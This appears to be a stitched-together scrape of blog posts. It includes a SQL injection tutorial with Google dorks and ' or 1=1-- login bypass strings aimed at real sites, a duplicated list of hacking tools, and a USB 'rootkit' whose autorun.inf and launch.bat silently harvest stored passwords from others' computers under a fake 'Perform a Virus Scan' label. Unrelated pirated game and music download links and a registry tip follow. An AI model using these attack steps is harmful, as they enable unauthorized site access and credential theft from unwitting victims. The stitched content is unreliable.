list of sql injection strings

One of the major problems with SQL is its poor security issues surrounding is the login and url strings. This tutorial is not going to go into detail on why these string work as all these details have been given in my previous article Top 10 Tricks to exploit SQL Server Systems .

First SEARCH the following Keywords in Google or any Search Engine:

admin\login.asp
login.asp

with these two search string you will have plenty of targets to chose from…choose one that is Vulnerable

INJECTION STRINGS: How to use it?

This is the easiest part…very simple

On the login page just enter something like

user:admin (you dont even have to put this.)
pass:’ or 1=1–

or

user:’ or 1=1–
admin:’ or 1=1–

Some sites will have just a password so

password:’ or 1=1–

In fact I have compiled a combo list with strings like this to use on my chosen targets . There are plenty of strings in the list below. There are many other strings involving for instance UNION table access via reading the error pages table structure thus an attack with this method will reveal eventually admin U\P paths.

The one I am interested in are quick access to targets

PROGRAM

i tried several programs to use with these search strings and upto now only Ares has peformed well with quite a bit of success with a combo list formatted this way. Yesteday I loaded 40 eastern targets with 18 positive hits in a few minutes how long would it take to go through 40 sites cutting and pasting each string

combo example:

admin:’ or a=a–
admin:’ or 1=1–

And so on. You don’t have to be admin and still can do anything you want. The most important part is example:’ or 1=1– this is our basic injection string

Now the only trudge part is finding targets to exploit. So I tend to search say google for login.asp or whatever

inurl:login.asp
index of:/admin/login.asp

like this: index of login.asp

result:

http://www3.google.com/search?hl=en&ie=ISO…G=Google+Search

17,000 possible targets trying various searches spews out plent more

Now using proxy set in my browser I click through interesting targets. Seeing whats what on the site pages if interesting I then cut and paste URL as a possible target. After an hour or so you have a list of sites of potential targets like so

http://www.somesite.com/login.asp
http://www.another.com/admin/login.asp

and so on. In a couple of hours you can build up quite a list because I don’t select all results or spider for log in pages. I then save the list fire up Ares and enter

1) A Proxy list
2) My Target IP list
3) My Combo list
4) Start.

Now I dont want to go into problems with users using Ares..thing is i know it works for me…

Sit back and wait. Any target vulnerable will show up in the hits box. Now when it finds a target it will spew all the strings on that site as vulnerable. You have to go through each one on the site by cutting and pasting the string till you find the right one. But the thing is you know you CAN access the site. Really I need a program that will return the hit with a click on url and ignore false outputs. I am still looking for it. This will saves quite a bit of time going to each site and each string to find its not exploitable.

There you go you should have access to your vulnerable target by now

Another thing you can use the strings in the urls were user=? edit the url to the = part and paste ‘ or 1=1– so it becomes

user=’ or 1=1– just as quick as login process

Combo List

There are lot of other variations of the Injection String which I cannot put on my blog because that is Illegal. If you are interested I can send it to you through Email. Just write in your email address in comment and I will send it to you as early as possible but you need to remain patient it may take 1 or 2 days.

Happy Hunting

top 10 hacking tools

This is the Collection of Best Windows Hacking Tools:

1. Cain & Abel – Cain & Abel is a password recovery tool for the Microsoft Windows Operating System. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols.

2. SuperScan – SuperScan is a powerful TCP port scanner, pinger, resolver. SuperScan 4 (Current Version) is a completely-rewritten update of the highly popular Windows port scanning tool, SuperScan.

3. GFI LANguard Network Security Scanner – GFI LANguard N.S.S. is a network vulnerability management solution that scans your network and performs over 15,000 vulnerability assessments. It identifies all possible security threats and provides you with tools to patch and secure your network. GFI LANguard N.S.S. was voted Favorite Commercial Security Tool by NMAP users for 2 years running and has been sold over 200,000 times!

4. Retina – Retina Network Security Scanner, recognised as the industry standard for vulnerability assessment, identifies known security vulnerabilities and assists in prioritising threats for remediation. Featuring fast, accurate, and non-intrusive scanning, users are able to secure their networks against even the most recent of discovered vulnerabilities.

5. SamSpade – SamSpade provides a consistent GUI and implementation for many handy network query tasks. It was designed with tracking down spammers in mind, but can be useful for many other network exploration, administration, and security tasks. It includes tools such as ping, nslookup, whois, dig, traceroute, finger, raw HTTP web browser, DNS zone transfer, SMTP relay check, website search, and more.

6. N-Stealth – N-Stealth is a commercial web server security scanner. It is generally updated more frequently than free web scanners such as whisker and nikto, but you have to pay for the privilege.

7. Solarwinds – Solarwinds contains many network monitoring, discovery and attack tools. The advanced security tools not only test internet security with the SNMP Brute Force Attack and Dictionary Attack utilities but also validate the security on Cisco Routers with the Router Security Check. The Remote TCP Reset remotely display all active sessions on a device and the Password Decryption can decrypt Type 7 Cisco Passwords. The Port Scanner allows testing for open TCP ports across IP Address and port ranges or selection of specific machines and ports.

8. Achilles – The first publicly released general-purpose web application security assessment tool. Achilles acts as a HTTP/HTTPS proxy that allows a user to intercept, log, and modify web traffic on the fly. Due to a cyber squatter, Achilles is no longer online at its original home of www.Digizen-Security.com…OOPS!

9. CookieDigger - CookieDigger helps identify weak cookie generation and insecure implementations of session management by web applications. The tool works by collecting and analyzing cookies issued by a web application for multiple users. The tool reports on the predictability and entropy of the cookie and whether critical information, such as user name and password, are included in the cookie values.

10. Netcat (The Network SwissArmy Knife) – Netcat was originally a Unix utility which reads and writes data across network connections, using TCP or UDP protocol. It is designed to be a reliable “back-end” tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities

top 10 hacking tools

This is the Collection of Best Windows Hacking Tools:

1. Cain & Abel – Cain & Abel is a password recovery tool for the Microsoft Windows Operating System. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols.

2. SuperScan – SuperScan is a powerful TCP port scanner, pinger, resolver. SuperScan 4 (Current Version) is a completely-rewritten update of the highly popular Windows port scanning tool, SuperScan.

3. GFI LANguard Network Security Scanner – GFI LANguard N.S.S. is a network vulnerability management solution that scans your network and performs over 15,000 vulnerability assessments. It identifies all possible security threats and provides you with tools to patch and secure your network. GFI LANguard N.S.S. was voted Favorite Commercial Security Tool by NMAP users for 2 years running and has been sold over 200,000 times!

4. Retina – Retina Network Security Scanner, recognised as the industry standard for vulnerability assessment, identifies known security vulnerabilities and assists in prioritising threats for remediation. Featuring fast, accurate, and non-intrusive scanning, users are able to secure their networks against even the most recent of discovered vulnerabilities.

5. SamSpade – SamSpade provides a consistent GUI and implementation for many handy network query tasks. It was designed with tracking down spammers in mind, but can be useful for many other network exploration, administration, and security tasks. It includes tools such as ping, nslookup, whois, dig, traceroute, finger, raw HTTP web browser, DNS zone transfer, SMTP relay check, website search, and more.

6. N-Stealth – N-Stealth is a commercial web server security scanner. It is generally updated more frequently than free web scanners such as whisker and nikto, but you have to pay for the privilege.

7. Solarwinds – Solarwinds contains many network monitoring, discovery and attack tools. The advanced security tools not only test internet security with the SNMP Brute Force Attack and Dictionary Attack utilities but also validate the security on Cisco Routers with the Router Security Check. The Remote TCP Reset remotely display all active sessions on a device and the Password Decryption can decrypt Type 7 Cisco Passwords. The Port Scanner allows testing for open TCP ports across IP Address and port ranges or selection of specific machines and ports.

8. Achilles – The first publicly released general-purpose web application security assessment tool. Achilles acts as a HTTP/HTTPS proxy that allows a user to intercept, log, and modify web traffic on the fly. Due to a cyber squatter, Achilles is no longer online at its original home of www.Digizen-Security.com…OOPS!

9. CookieDigger - CookieDigger helps identify weak cookie generation and insecure implementations of session management by web applications. The tool works by collecting and analyzing cookies issued by a web application for multiple users. The tool reports on the predictability and entropy of the cookie and whether critical information, such as user name and password, are included in the cookie values.

10. Netcat (The Network SwissArmy Knife) – Netcat was originally a Unix utility which reads and writes data across network connections, using TCP or UDP protocol. It is designed to be a reliable “back-end” tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities

usb hack

Hello Friends,

Have you ever thought that a Simple USB Drive can be used as a Destructive Tool for Hacking Passwords? Today I will show you how to hack Passwords using an USB Pen Drive.

As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places.

Using these tools and an USB pendrive

you can create your own rootkit to hack passwords from your friend’s/college Computer. We need the following tools to create our rootkit.

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0

Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

Here is a step by step procedure to create the password hacking toolkit.

NOTE: You must temporarily disable your Anti-Virus before following these steps.

1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.

ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad as autorun.inf

Now copy the autorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

save the Notepad as launch.bat

Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend’s PC or on your college computer. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.

This hack works on Windows 2000, XP and Vista.

Disclaimer: I am not responsible for any kind of Damage caused by using the above information. The above Tutorial is only for recovering forgotten passwords

3d table tennis game

Table tennis 3d (2009/GER)

Table tennis 3d simulator Of tischtennis Of simulator 3d (2009/GER)

This image has been resized. Click this bar to view the full image. The original image is sized 1024x768.

This image has been resized. Click this bar to view the full image. The original image is sized 1280x1024.

Playing the simulator of table tennis you you perceive itself with [professionalinym] player on the professional matches. Select your own player and break through through “the perspiration and the blood” to the peak of glory. Different places of matches simply seize their by the atmosphere in this surprising game. [Vyinryvaya] [protivnikav] you can improve its clothing and buy the more advanced equipment. Realistic physics, detailed drawing, rapid transfers of ball, many different inventories and the agitating play maneuvers make this game with enormous pleasure for all worshippers of table tennis!

Description:
Playing the simulator of table tennis you you perceive itself with [professionalinym] player on the professional matches. Select your own player and break through through “the perspiration and the blood” to the peak of glory. Different places of matches simply seize their by the atmosphere in this surprising game. [Vyinryvaya] [protivnikav] you can improve its clothing and buy the more advanced equipment. Realistic physics, detailed drawing, rapid transfers of ball, many different inventories and the agitating play maneuvers make this game with enormous pleasure for all worshippers of table tennis!

System requirements:
# Pentium of 1,2 GHz Of prozessor of oder of hoher
# DirectX of 9.0c fahige Of grafikkarten of mit 256 MB Of grafikspeicher
# DirectX of 9.0c fahige Of soundkarte
# 256 OF MB RAM
# DVD of oder CD -ROm Of laufwerk
# 700 OF MB of freier Of festplattenspeicherplatz
# optional Of gamepad
# Windows Of version: XP (SP2)/Of vista




Code:
http://rapidshare.com/files/19282828...M.TR.part1.rar
Code:
http://rapidshare.com/files/19301718...M.TR.part2.rar
Code:
http://rapidshare.com/files/19304427...M.TR.part3.rar
Code:
http://rapidshare.com/files/19306971...M.TR.part4.rar
Code:
http://rapidshare.com/files/19309653...M.TR.part5.rar
Code:
http://rapidshare.com/files/19310798...M.TR.part6.rar

Linkin Park - Complete Discography (2000 - 2009)

Linkin Park - Complete Discography (2000 - 2009)

---

This image has been resized. Click this bar to view the full image. The original image is sized 1023x711.

Linkin Park - New Divide (2009)











Download~

Code:

 http://rapidshare.com/files/235146894/New_Divide.rar

OR

http://www.megaupload.com/?d=2TEJMAVQ

OR

http://www.filehostme.com/3xq7v84thxua.html

Linkin Park - Lockjaw (2009) [Instrumental from LP]

Download~

Code:

 http://www.filehostme.com/8iaas0jv7f9x.html
OR
http://rapidshare.com/files/235045000/Linkin_Park_-_Lockjaw__
Recorded_by_Mike_Shinoda_n_Rob_Bourdon____XTON3.CO.CC__.mp3

Minutes To Midnight (2007)

Code:

1.    Wake              
2.    Given Up
3.    Leave Out All The Rest
4.    Bleed It Out
5.    Shadow Of The Day
6.    What I've Done
7.    Hands Held High
8.    No More Sorrow
9.    Valentine's Day
10.    In Between
11.    In Pieces
12.    The Little Things Give You Away

Download~

Code:

 http://rapidshare.com/files/233385818/midnight.rar

OR

http://www.filehostme.com/9upb794ndhx7.html

Meteora (2003)

Code:

1.    Foreword              
2.    Don't Stay
3.    Somewhere I Belong
4.    Lying From You
5.    Hit The Floor
6.    Easier To Run
7.    Faint
8.    Figure.09
9.    Breaking The Habit
10.    From The Inside
11.    Nobody's Listening
12.    Session              
13.    Numb

Download~

Code:

http://rapidshare.com/files/233381054/Meteora.rar

OR

http://www.filehostme.com/g1duqwvs7ip3.html

Hybrid Theory (2000)

Code:

1.    Papercut              
2.    One Step Closer              
3.    With You              
4.    Points of Authority
5.    Crawling
6.    Runaway  
7.    By Myself
8.    In The End
9.    A Place For My Head
10.    Forgotten
11.    Cure For The Itch              
12.    Pushing Me Away

Download~

Code:

 http://rapidshare.com/files/233375436/H.T.rar

OR

http://www.filehostme.com/cp4i5wavi170.html

Remixes~

Linkin Park - Songs From The Underground (2008)

Code:

Tracklist:
1. Announcement Service Public
2. Qwerty (Studio Version)
3. And One
4. Sold My Soul To Yo Mama
5. Dedicated (Demo 1999)
6. Hunger Strike (Live from Projekt Revolution 2008) - Chris Cornell feat. Chester Bennington
7. My December (Live 2008)
8. Part of Me

Size: ~52MB

Download~

Code:

http://www.filehostme.com/k6tlinvbuhsv.html

OR

http://rapidshare.com/files/225551558/LP-SFTU08.rar

Linkin Park FT Jay-Z Numb Encore New Version (2008)







Download~

Code:

http://rapidshare.com/files/134987572/Numb_Encore_Remix_2008.mp3

Jay-Z and Linkin Park - Collision Course (2004)

Code:

1. Dirt off Your Shoulder/Lying from You
2. Big Pimpin'/Papercut
3. Jigga What/Faint
4. Numb/Encore
5. Izzo/In the End
6. Points of Authority/99 Problems/One Step Closer

Download~

Code:

http://rapidshare.com/files/174166830/Collision_Course.rar

OR

http://www.megaupload.com/?d=9WU0WG80

Linkin Park - Piano Instrumentals (2006)

Code:

01. Faint
02. In the End
03. Krawling
04. Lying from you
05. Numb
06. breaking the habit
07. Easier to Run
08. Krawling (remix)
09. Paper cut
10. Pushing me away

Download~

Code:

http://rapidshare.com/files/174578666/_2003__Linkin_Park_Piano_Instrumental.rar

Linkin Park - Live In Texas (2003)

Code:

01 Somewhere I Belong
02 Lying From You
03 Papercut
04 Points Of Authority
05 Runaway
06 Faint
07 From The Inside
08 P5hng Me A*wy
09 Numb
10 Crawling
11 In The End
12 One Step Closer

Download~

Code:

http://rapidshare.com/files/199756023/LP.Texas.rar
pw:  tiedye3560

Linkin Park - Reanimation (2002)

Code:

1.   Opening
2.   Pts.Of.Athrty
3.   Enth E Nd
4.   (Chali)
5.   Frgt/10
6.   P5hng Me A*wy
7.   Plc.4 Mie Haed
8.   X-ecutioner Style
9.   H! Vltg3
10.   (Riff Raff)
11.   Wth>You
12.   PPr:Kut
13.   Rnw@y
14.   My{Dsmbr
15.   (Stef)
16.   By_Myslf
17.   Kyur4 Th Ich
18.   1stp Klosr
19.   Krwlng

Download~

Code:

http://hotfile.com/dl/2010719/273677f/Linkin_Park
-Reanimation-2002-SER.zip.html

In The End : Live & Rare - Linkin Park

Code:

1. In the End (Album Version) - 3:36
2. Papercut (Live at Docklands Arena, London) - 3:12
3. Points Of Authority (Live at Docklands Arena, London) - 3:29
4. A Place For My Head (Live at Docklands Arena, London) - 3:10
5. Step Up (1999 Demo) - 3:54
6. My December - 4:20
7. High Voltage (2000 Reprise) - 3:45

Download~

Code:

http://rapidshare.com/files/100042853/
In_the_End-Live___Rare.rar

__________________

Create Your Own Logon Message

Create Your Own Logon Message
You can create a message that will appear when you log on to your computer.

Click Start, click Run, type regedit, and then click OK.

In the Registry Editor, drill down to the following key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

Right-click LegalNoticeCaption, click Modify, type My Windows XP Machine, and then click OK.

Right-click LegalNoticeText, click Modify, and then type your message.

Close the editor and your new message will appear at every log on.

This tip applies to computers that are part of a domain. For stand-alone or peer-to-peer networks, the custom screen appears just before the Welcome screen.

You may need to have an administrator account on your computer to make changes to the registry. Incorrectly editing the registry may severely damage your system. At the very least, you should back up any valued data on the computer before making changes to the registry.

Enjoy